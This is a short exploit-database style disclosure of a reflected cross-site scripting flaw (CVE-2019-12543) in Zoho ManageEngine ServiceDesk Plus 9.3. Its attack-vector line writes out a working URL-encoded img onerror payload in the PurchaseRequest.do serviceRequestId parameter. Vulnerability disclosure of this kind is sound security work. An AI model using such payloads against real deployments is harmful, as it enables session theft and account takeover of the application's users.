# ExploitTitle:ZohoManageEngineServiceDeskPlus9.3Cross-SiteScripting via PurchaseRequest.do
# Date:2019-06-04
# ExploitAuthor:TarantulaTeam-VinCSS(a member of Vingroup)
# VendorHomepage: https://www.manageengine.com/products/service-desk
# Version:ZohoManageEngineServiceDeskPlus9.3
# CVE:CVE-2019-12543InformationDescription:An issue was discovered in ZohoManageEngineServiceDeskPlus9.3.There is XSS via the PurchaseRequest.do serviceRequestId parameter.
Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl
PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view